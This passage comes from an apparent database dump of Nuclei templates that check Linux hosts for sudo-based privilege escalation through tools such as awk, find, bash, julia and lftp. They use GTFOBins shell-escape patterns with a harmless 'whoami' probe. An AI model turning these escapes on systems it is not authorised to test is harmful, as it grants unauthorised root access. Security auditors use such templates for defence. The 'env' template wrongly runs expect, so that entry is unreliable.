marked read only by writing readonly name=value With no arguments\n reference:\n - https://gtfobins.github.io/gtfobins/ash/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,ash,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n ash -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo ash -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022073824aab7529fe8c91f63415d0f4ef956229e29ad77d523aae3e0dda2db7cc7f0221009a6a43a288911d7294b0c5e30d209f8bd26c2bf0a3add2f2b6cc0afe5135704f:922c64590222798bb761d5b6d8e72950", "hash": "0e9c8ecb70439f81656daf9e0e1e9509", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c38" }, "name": "privesc-awk.yaml", "content": "id: privesc-awk\n\ninfo:\n name: awk - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n AWK is a domain-specific language designed for text processing and typically used as a data extraction and reporting tool. Like sed and grep, it is a filter, and is a standard feature of most Unix-like operating systems.\n reference:\n - https://gtfobins.github.io/gtfobins/awk/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,awk,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n awk 'BEGIN {system(\"whoami\")}'\n\n - engine:\n - sh\n - bash\n source: |\n sudo awk 'BEGIN {system(\"whoami\")}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a00463044022071c201eea9ea070ff16f969f8b05159635ab0cd518353553b47dc0712896376f022056668475360f552aba1f0d8130cb72104bd5c53615d342a38a0018bcb8a8cc96:922c64590222798bb761d5b6d8e72950", "hash": "254b701bae2d2a6ac9e7e68c8ba42f71", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c39" }, "name": "privesc-bash.yaml", "content": "id: privesc-bash\n\ninfo:\n name: Bash - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Bash is a Unix shell and command language written by Brian Fox for the GNU Project as a free software replacement for the Bourne shell. The shell's name is an acronym for Bourne Again Shell, a pun on the name of the Bourne shell that it replaces and the notion of being born again.\n reference:\n - https://gtfobins.github.io/gtfobins/bash/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,bash,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n bash -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo bash -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100b7139b5d1f14010b53722d2116b731cde04bf9f88e93d534af71430619c6519e022014318f5a98bdaf551bff8af32af0fddc900396fd795b982fb976259006f20b75:922c64590222798bb761d5b6d8e72950", "hash": "3a5bc02fbf0b8e16c9e3bbe70ef66501", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c3a" }, "name": "privesc-cdist.yaml", "content": "id: privesc-cdist\n\ninfo:\n name: Cdist - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n cdist is a free software configuration management tool for Unix-like systems. It manages nodes over SSH using the Bourne Shell, and does not require any additional software to be installed on target nodes.\n reference:\n - https://gtfobins.github.io/gtfobins/cdist/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,cdist,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n cdist shell -s whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo cdist shell -s whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022067a276a4edab8499fe86d5520587f431af94088fec0bb96acff43c6fcc88233b022100f40168eb0bdde93de1a6a747737c96db048ef16ffa8eb6666722301eb3f0da4e:922c64590222798bb761d5b6d8e72950", "hash": "b0c5b2d1d3e346f329a6a91887295080", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c3b" }, "name": "privesc-choom.yaml", "content": "id: privesc-choom\n\ninfo:\n name: choom - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n choom is a command-line utility in Linux that allows users to change the memory limits of a process. It can be used for privilege escalation by manipulating the memory limits of a process to gain elevated privileges.\n reference:\n - https://gtfobins.github.io/gtfobins/choom/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,choom,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n choom -n 0 whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo choom -n 0 whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100cd0a7dc9b51ef8f3f850d3fde75e025e13c61b464ac044825ac70107c66db1de0220290c09bd78a4e25f5cabc659f9441a3c168a1ca2c226f0ddf9316de01eb30461:922c64590222798bb761d5b6d8e72950", "hash": "7c82a78fcd2ee67c55893569db326504", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c3c" }, "name": "privesc-cpulimit.yaml", "content": "id: privesc-cpulimit\n\ninfo:\n name: CPUlimit - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n cpulimit is a command-line utility in Linux that allows users to limit the CPU usage of a process. It can be used to control and limit the CPU usage of a specific process, which can be helpful in various scenarios such as preventing a process from consuming excessive CPU resources.\n reference:\n - https://gtfobins.github.io/gtfobins/cpulimit/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,cpulimit,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n cpulimit -l 100 -f whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo cpulimit -l 100 -f whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a004730450220230cb5251cd262f30d8d96775b9eb324039b16caa228f9e0ea8a9a22e54ccca3022100b4eebc3ca1fc773a07ad6a0acba3f2430804c8a1fbe1f4f3a7fe10cfec97c742:922c64590222798bb761d5b6d8e72950", "hash": "442a22951cf71ebad3efdef70af50c8f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c3d" }, "name": "privesc-csh.yaml", "content": "id: privesc-csh\n\ninfo:\n name: csh - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n csh stands for C Shell, which is a Unix shell with C-like syntax. It is a command-line interpreter that provides a command-line interface for Unix-like operating systems. It has features similar to other Unix shells such as bash and sh, but with a different syntax and set of features.\n reference:\n - https://gtfobins.github.io/gtfobins/csh/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,csh,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n csh -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo csh -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502202776b2a45218e0f408bac8a09800783f984d0f5263d65f4304c36046254535e9022100f7ff92e98d47577366baf47baa75b9a047b5f385964daa66c712176e1365f20a:922c64590222798bb761d5b6d8e72950", "hash": "dfa0f5df5dc7ce7d87ee6fb1621b2266", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c3e" }, "name": "privesc-csvtool.yaml", "content": "id: privesc-csvtool\n\ninfo:\n name: csvtool - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n csvtool is a command-line utility in Unix-like operating systems that provides various tools for working with CSV (Comma-Separated Values) files. It can be used to manipulate, process, and analyze CSV data from the command line, making it a useful tool for tasks such as data extraction, transformation, and loading.\n reference:\n - https://gtfobins.github.io/gtfobins/csvtool/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,csvtool,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n csvtool call 'whoami;false' /etc/passwd\n\n - engine:\n - sh\n - bash\n source: |\n sudo csvtool call 'whoami;false' /etc/passwd\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100d139416288db46c8f34e489a066c9e3dd997d53a51839622350e6d40259d379f02202c588bd093b543b8e0fe14f766232fdac398e51d65498a5eeee3dd9d3bdaea99:922c64590222798bb761d5b6d8e72950", "hash": "3df35ad97e649b661e6f0769211f2cbc", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c3f" }, "name": "privesc-dash.yaml", "content": "id: privesc-dash\n\ninfo:\n name: Dash - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n dash is a POSIX-compliant shell that is commonly used as the default system shell on Debian-based systems. It is designed to be a lightweight and fast shell, suitable for scripting and system administration tasks. It aims to be compatible with the POSIX standard for shells, providing a minimalistic and efficient environment for running shell scripts.\n reference:\n - https://gtfobins.github.io/gtfobins/dash/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,dash,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n dash -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo dash -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a0046304402206b902983b85252ee8566b012c90d8c552942e0781aafc72bc20dfb1294d6d0a80220739aaa3c21cae29f96b977cfb6e5b06da5936bf43e2174e9b67a97b07ec287fe:922c64590222798bb761d5b6d8e72950", "hash": "1f4ab22a292818258f7d06e11ab87cad", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c40" }, "name": "privesc-dc.yaml", "content": "id: privesc-dc\n\ninfo:\n name: dc - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n dc is a command-line calculator in Unix and Unix-like operating systems. It uses reverse Polish notation (RPN) and provides a simple and efficient way to perform arithmetic operations from the command line. It can be used for basic and advanced mathematical calculations, making it a handy tool for scripting and quick calculations in the terminal.\n reference:\n - https://gtfobins.github.io/gtfobins/dc/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,dc,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n dc -e '!whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo dc -e '!whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502201acdf1dadca97a95fb57db52fcdf888e35702ff28eb21f4f835d123a3771d5b7022100c92ab141e6e080b7d64def2785e6c81d163d4f1bbd235e8f38e1d77d625882f4:922c64590222798bb761d5b6d8e72950", "hash": "0547378c06b9b2978a3c49c3d01f2f34", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c41" }, "name": "privesc-distcc.yaml", "content": "id: privesc-distcc\n\ninfo:\n name: distcc - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n distcc is a distributed compilation tool for C, C++, and Objective-C. It allows a user to distribute compilation of these languages across several machines on a network, which can significantly speed up the compilation process for large projects.\n reference:\n - https://gtfobins.github.io/gtfobins/distcc/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,distcc,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n distcc whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo distcc whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100e9e5380b47cbbf1bb48a21de5671357d05c196f143686b12cae3d9632925201c022100bc2f86383e81d0d71fa76764129bcc128eca4028e5634faa4de435a06fc9f735:922c64590222798bb761d5b6d8e72950", "hash": "69f1f4660e0f0d8caefb0c1b2cbff9b8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c42" }, "name": "privesc-elvish.yaml", "content": "id: privesc-elvish\n\ninfo:\n name: elvish - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n elvish is a Unix shell that emphasizes expressiveness and extensibility. It aims to provide a more user-friendly and programmable shell experience, with features such as a powerful scripting language, a rich set of data types, and a clean and consistent syntax.\n reference:\n - https://gtfobins.github.io/gtfobins/elvish/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,elvish,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n elvish -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo elvish -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100a1f071fa9a6361b4bd0b72318c713adb186b0544408f7afa7dec8c2cfd5f7a42022100810d9cc3ca386217a4fcc535d63205ef64870762732e38fdf854feef4a3b5977:922c64590222798bb761d5b6d8e72950", "hash": "356f4290471088d6a6919ae34a1d7cf6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c43" }, "name": "privesc-enscript.yaml", "content": "id: privesc-enscript\n\ninfo:\n name: enscript - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n enscript is a command-line tool used for converting text files to PostScript format for printing. It provides various options for formatting and manipulating the output, making it a useful tool for generating high-quality printed documents from text files.\n reference:\n - https://gtfobins.github.io/gtfobins/enscript/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,enscript,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n enscript /dev/null -qo /dev/null -I 'whoami >&2'\n\n - engine:\n - sh\n - bash\n source: |\n sudo enscript /dev/null -qo /dev/null -I 'whoami >&2'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502202b0cc80a3f8c6f4cc2ff2ac8425d0b66a4b73ef0a723c77e140f7c7823ca6eaf022100afcb4d172cb6ec42e79b03a12de1c5b5f6e5e59b7e0648e4b52822eba9e2455d:922c64590222798bb761d5b6d8e72950", "hash": "96fea1691687ad27b7e62875332148d9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c44" }, "name": "privesc-env.yaml", "content": "id: privesc-env\n\ninfo:\n name: env - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n In Linux, the env command is used to display or modify the environment variables for a command. It can be used to set environment variables for a specific command or to print the current environment variables.\n reference:\n - https://gtfobins.github.io/gtfobins/env/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,env,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n expect -c 'spawn whoami;interact'\n\n - engine:\n - sh\n - bash\n source: |\n sudo expect -c 'spawn whoami;interact'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a0046304402207dac7db6e92f9149122ac4e7f725350cf0468f92e66716464588d570627ee4d802204ba57aaa26eca8123aeef474c5cf3a8310a4cfe108bae30307745a5df57762f0:922c64590222798bb761d5b6d8e72950", "hash": "cd312a0a7fa4b3f2828208ffa8f67703", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c45" }, "name": "privesc-expect.yaml", "content": "id: privesc-expect\n\ninfo:\n name: expect - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n expect is a Unix scripting and testing utility that automates interactive applications such as telnet, ftp, passwd, fsck, rlogin, tip, and more. It uses scripts to control interactive applications, making it useful for automating tasks that involve user input.\n reference:\n - https://gtfobins.github.io/gtfobins/expect/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,expect,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n expect -c 'spawn whoami;interact'\n\n - engine:\n - sh\n - bash\n source: |\n sudo expect -c 'spawn whoami;interact'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100d8da30cc73592bff116cb40a378563224df22bb81cc0fcf7e24e5c6d514aea12022075603006d0e05c5c833dac0f718846bd475be23ccd5adeeb4eb0fe6a270fb89b:922c64590222798bb761d5b6d8e72950", "hash": "6874c97d279dccbac9c54ffe2f202505", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c46" }, "name": "privesc-find.yaml", "content": "id: privesc-find\n\ninfo:\n name: find - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The find command in Linux is used to search for files and directories in a directory hierarchy based on various criteria such as name, type, size, and permissions. It is a powerful tool for locating files and performing operations on them, such as executing commands or applying changes.\n reference:\n - https://gtfobins.github.io/gtfobins/find/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,find,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n find . -exec whoami \\; -quit\n\n - engine:\n - sh\n - bash\n source: |\n sudo find . -exec whoami \\; -quit\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a0046304402207f55b1ac220ad114cf5cd2341a388a3860f134489b662ff708d8553b7156207a02201bddad6e9a46aa5b077f01de8b269b2797007741d8c6f38b9ddc7724462497e5:922c64590222798bb761d5b6d8e72950", "hash": "182cbf57dae590d7b32c2cc2308c159d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c47" }, "name": "privesc-fish.yaml", "content": "id: privesc-fish\n\ninfo:\n name: fish - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n fish is a user-friendly command-line shell for Unix-like operating systems. It provides features such as syntax highlighting, autosuggestions, and a built-in scripting language. Fish aims to be easy to use and learn, making it a popular choice for both interactive shell usage and scripting.\n reference:\n - https://gtfobins.github.io/gtfobins/fish/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,fish,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n fish -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo fish -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100fc1295d0916f1aa41b0e5372705deb27042429a246f15d9afa5efe9fa8e64e5202201b1a16a397a1465530a084cb30d64536bdcb606c77ba9ee5dcb26c8300722f00:922c64590222798bb761d5b6d8e72950", "hash": "9ddc2b17c56a6676730f7831153894b9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c48" }, "name": "privesc-flock.yaml", "content": "id: privesc-flock\n\ninfo:\n name: Flock - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n flock is a command-line utility in Unix-like operating systems that is used to manage file locks. It can be used to synchronize access to a file among multiple processes, preventing conflicts and ensuring data integrity. Additionally, flock can be used in shell scripts to control access to critical sections of code.\n reference:\n - https://gtfobins.github.io/gtfobins/flock/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,flock,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n flock -u / whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo flock -u / whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100de7de6316a36966e591a532e458496e3deafdcf99db9d1b6e06ba8804b5156bf022035df063cb6d81a55b81577f7e7cc8f167990d113dbc9b870d5c388a0c7feb8fc:922c64590222798bb761d5b6d8e72950", "hash": "48085a4de71f36c5d37e6ba96d24a577", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c49" }, "name": "privesc-gawk.yaml", "content": "id: privesc-gawk\n\ninfo:\n name: gawk - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n gawk is the GNU implementation of the AWK programming language. It is a powerful text processing tool that allows for pattern scanning and processing of text files. gawk is commonly used for data extraction, reporting, and manipulation tasks in shell scripts and command-line environments.\n reference:\n - https://gtfobins.github.io/gtfobins/gawk/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,gawk,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n gawk 'BEGIN {system(\"whoami\")}'\n\n - engine:\n - sh\n - bash\n source: |\n sudo gawk 'BEGIN {system(\"whoami\")}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100c4027738da47964b3c3ed949b3583c0ddc7553f648cf97255cb9529903a8c4f6022100aeec04af6a33ede7e65f9b18a43c832bce2ad79217b73934ae9af56b247aaf50:922c64590222798bb761d5b6d8e72950", "hash": "0a512fa274b04da88f736b00f908ce52", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c4a" }, "name": "privesc-grc.yaml", "content": "id: privesc-grc\n\ninfo:\n name: grc - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n grc is a command-line utility that enhances the output of other commands with color and style. It is commonly used to improve the readability of command output by adding color highlighting and formatting. grc can be configured to work with various commands and is often used to make log files and command output easier to interpret.\n reference:\n - https://gtfobins.github.io/gtfobins/grc/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,grc,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n grc --pty whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo grc --pty whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a0046304402201157d0174dbcda2e8968ef3fc2ffb4185c7892c217fad0be4f9c6f7d5076e76202203f73255a3c73317a66097d5a835ea51e0f00e38c38fd2067ac468ad5afa537a9:922c64590222798bb761d5b6d8e72950", "hash": "e0a99e57eaaeaf21972557e8a86a3320", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c4b" }, "name": "privesc-ionice.yaml", "content": "id: privesc-ionice\n\ninfo:\n name: ionice - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n ionice is a command-line utility in Linux that is used to set or get the I/O scheduling class and priority for a program. It allows users to control the I/O priority of a process, which can be useful for managing system resources and improving overall system performance.\n reference:\n - https://gtfobins.github.io/gtfobins/ionice/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,ionice,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n ionice whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo ionice whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100d9c0c0313cfec8a4e961cb41292292259e48ac63ae786404c9987e32e7cff66b022100da11803df69fe86103fc73191da5b16a659cca239ba3183af3a0faaee2bf6482:922c64590222798bb761d5b6d8e72950", "hash": "b1c404fa289e4f8e98b7ee1129d62f7f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c4c" }, "name": "privesc-julia.yaml", "content": "id: privesc-julia\n\ninfo:\n name: Julia - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Julia is a high-level, high-performance programming language for technical computing. It is designed for numerical and scientific computing, but it is also used for general-purpose programming. Julia is known for its speed and ease of use, and it has a growing community of users and developers.\n reference:\n - https://gtfobins.github.io/gtfobins/julia/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,julia,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n julia -e 'run(`whoami`)'\n\n - engine:\n - sh\n - bash\n source: |\n sudo julia -e 'run(`whoami`)'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100da869705e57f9c47830956a1baf810515df6720b8a0bad243237ea03d4cb3c6a022065101ef22cf2d9f15db6ff54329a952fdc051c7850714c2e19c9b590bcdcd3cb:922c64590222798bb761d5b6d8e72950", "hash": "05178e8bd11fd2f0de5110caccdb5cdc", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c4d" }, "name": "privesc-lftp.yaml", "content": "id: privesc-lftp\n\ninfo:\n name: lftp - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n lftp is a command-line file transfer program for Unix-like systems. It supports various protocols such as FTP, HTTP, SFTP, and FISH, and provides a range of features for file transfer and mirroring. lftp is known for its reliability and scriptability, making it a popular choice for automated file transfer tasks.\n reference:\n - https://gtfobins.github.io/gtfobins/lftp/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,lftp,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n lftp -c '!whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo lftp -c '!whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a004630440220462cec07ea103fea931c8907e3c7ed09157109f08fac37e1c568ba71dedce6b602200279b85c4e3358fee401e7f4e3e7c655dccc0b5dcdec50007c11de56f2362612:922c64590222798bb761d5b6d8e72950", "hash": "81e486f2acc1fe2d2b94c85a4ef7adfa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c4e" }, "name": "privesc-ltrace.yaml", "content": "id: privesc-ltrace\n\ninfo:\n name: 